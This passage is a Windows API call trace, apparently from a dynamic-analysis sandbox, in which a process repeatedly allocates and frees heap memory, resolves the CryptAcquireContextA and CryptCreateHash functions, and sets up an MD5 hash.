0x2e55008 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0266.371] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0266.371] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.372] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.372] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0266.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0266.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.374] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0266.374] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0266.375] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0266.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0266.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0266.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69a08 [0266.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0266.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.375] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0266.375] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0266.375] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0266.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0266.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0266.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.415] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0266.416] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.417] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0266.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.417] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.417] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.418] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.418] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.419] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.419] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.439] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0266.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.439] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.440] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0266.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.440] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.440] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0266.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0266.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.441] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0266.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.441] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0266.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.441] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0266.441] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0266.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51cd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.442] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0266.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0266.442] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f157f0 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0266.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0266.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.445] HeapFree (in: 